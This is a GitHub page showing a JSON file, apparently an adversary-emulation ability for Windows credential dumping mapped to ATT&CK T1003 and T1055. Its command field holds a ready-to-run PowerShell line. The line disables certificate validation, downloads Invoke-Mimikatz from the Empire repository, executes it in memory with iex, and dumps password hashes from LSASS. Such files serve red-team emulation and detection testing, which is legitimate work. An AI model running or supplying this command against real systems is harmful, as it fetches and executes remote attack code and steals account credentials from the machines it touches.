-
Notifications
You must be signed in to change notification settings - Fork 2
/
ca-003.json
19 lines (19 loc) · 880 Bytes
/
ca-003.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[
{
"id": "ca-003",
"name": "Credential Dumping (T1003) using Process Injection (T1055)",
"description": "Mimikatz lsadump::sam is executed via Invoke-Mimikatz to dump hashes via process injection into LSASS.",
"tactic": "credential-access",
"technique": {
"attack_id": "T1003",
"name": "Credential Dumping"
},
"type": "endpoint",
"platform": "windows",
"interface": "psh",
"input_argument": "",
"output_argument": "",
"command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\r\n $web = (New-Object System.Net.WebClient);\r\n $result = $web.DownloadString(\"https:\/\/raw.githubusercontent.com\/EmpireProject\/Empire\/master\/data\/module_source\/credentials\/Invoke-Mimikatz.ps1\");\r\n iex $result;\r\n Invoke-Mimikatz;",
"dependencies": ""
}
]